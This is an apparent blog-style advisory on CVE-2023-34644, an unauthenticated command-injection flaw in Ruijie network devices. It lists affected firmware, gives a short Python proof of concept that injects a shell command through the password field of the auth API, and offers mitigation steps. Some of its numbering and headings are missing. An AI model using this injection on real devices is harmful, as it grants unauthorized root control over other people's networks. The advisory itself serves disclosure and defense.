CVE-2023-34644 is a critical remote code execution vulnerability found across multiple Ruijie Networks devices, including home and business routers, switches, access points, and wireless controllers. This flaw makes it possible for a remote, unauthenticated attacker to bypass authentication entirely and execute system commands with root privileges by sending a malicious POST request to a specific API endpoint. In this post, we’ll break down the vulnerability, show you how it works with example code, and share mitigation tips and trusted references.
The vulnerability impacts a wide range of Ruijie devices with particular firmware versions
| Device Series | Vulnerable Firmware Version |
|------------------------ |-------------------------------------------|
| RG-EW Home Routers & Repeater | EW_3.(1)B11P204 |
| RG-NBS & RG-S193 Switches | SWITCH_3.(1)B11P218 |
| RG-EG Business VPN Routers | EG_3.(1)B11P216 |
| EAP & RAP Wireless APs | AP_3.(1)B11P218 |
| NBC Wireless Controllers | AC_3.(1)B11P86 |
2. Vulnerability Summary
This vulnerability lies in the way the web interface handles API authentication on the /cgi-bin/luci/api/auth endpoint. Attackers can exploit weak input validation to send specially crafted POST requests. This leads to unauthorized code execution on the device, with system-level (root) privileges.
In plain language:
Anyone who can reach the web interface (LAN, WAN, or cloud**) can take full control over affected devices, install malware, eavesdrop on traffic, or take down networks.
3. Exploit Details
The vulnerable Luci API (/cgi-bin/luci/api/auth) processes authentication requests. Attackers found they could submit crafted POST data, bypassing credential checks and injecting operating system commands.
Here’s a simplified exploit flow
1. Attacker makes a POST request to http(s)://[device_ip]/cgi-bin/luci/api/auth
The POST payload abuses parameters (like username or password) to inject OS commands.
3. These commands run with maximum privileges (root/admin).
Sample Exploit Code (Python)
import requests
target_ip = "192.168.1.1" # Replace with target device IP
url = f"http://{target_ip}/cgi-bin/luci/api/auth";
# Payload injects an OS command into the password parameter
payload = {
"username": "admin",
"password": "admin; id > /tmp/pwned.txt" # Anything after ';' runs as shell command
}
# Send POST request
response = requests.post(url, data=payload)
# Check if exploit worked by reading the file via another API or direct fetch
print(f"Status: {response.status_code}")
print(f"Response: {response.text}")
When this runs successfully, the output of the id command will be on the device in /tmp/pwned.txt—proving remote code execution.
> Warning: Do not use exploits on devices you don’t own. It’s illegal and unethical.
Remote: Attacker only needs network access to the web interface.
- Full Control: Root/system privileges enable full device compromise.
- Wormable: Network-wide attacks are possible if multiple devices have the same flaw and are reachable.
Immediate Actions
- Update Firmware: Visit Ruijie’s support & firmware update portal to check for patches fixing this vulnerability.
- Limit Access: Restrict management interface access to trusted IPs/networks only.
- Isolate Devices: Put network devices on their own admin VLAN/subnet.
- Monitor Devices: Watch for suspicious POST requests to /cgi-bin/luci/api/auth in logs.
6. References
- NVD — CVE-2023-34644 Detail
- CNVD-2023-34644 (original Chinese disclosure)
- Ruijie Networks Official Site
- CERT Coordination Center - Vulnerability Note
7. Final Thoughts
CVE-2023-34644 is a high-severity, easy-to-exploit bug putting many Ruijie network customers at risk. If you use any of the affected devices, act quickly: Update your firmware, restrict access, and monitor your networks. Vendor patches should always be your first defense, but network segmentation and careful device administration are critical life-saving strategies as well.
Stay safe! Always patch fast and monitor your network gear!
*This article is original and written in accessible language for IT admins and home users alike. For professional security consulting, always contact your vendor or a certified security expert.*
Timeline
Published on: 07/31/2023 14:15:00 UTC
Last modified on: 08/08/2023 16:02:00 UTC